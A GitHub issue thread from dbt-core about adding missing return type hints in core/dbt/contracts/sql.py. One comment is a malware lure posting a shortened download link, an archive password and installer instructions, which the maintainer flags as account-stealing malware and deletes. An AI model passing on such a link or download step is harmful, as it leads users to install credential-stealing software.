### ISSUE TITLE
Add missing type hints to `core/dbt/contracts/sql.py`

### ISSUE THREAD

**Issue by QMalcolm** [dbt-labs/dbt-core#10614]
### Housekeeping

- [X] I am a maintainer of dbt-core

### Short description

We're putting some effort into improving our typing. There are two type errors in `core/dbt/contracts/sql.py`, we should fix them.

```
core/dbt/contracts/sql.py:32: error: Function is missing a return type annotation  [no-untyped-def]
core/dbt/contracts/sql.py:32: note: Use "-> None" if function does not return a value
core/dbt/contracts/sql.py:43: error: Function is missing a return type annotation  [no-untyped-def]
```

### Acceptance criteria

The type issues are fixed

### Suggested Tests

N/A

### Impact to Other Teams

None

### Will backports be required?

No

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by QMalcolm** [comment]
> The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

@caineblood thanks for pointing that out. Hopefully your message reached people before they clicked on it. Luckily, this should be a relatively low traffic issue, so I don't expect many saw it / interacted with it 🤞 I have deleted the offending comment
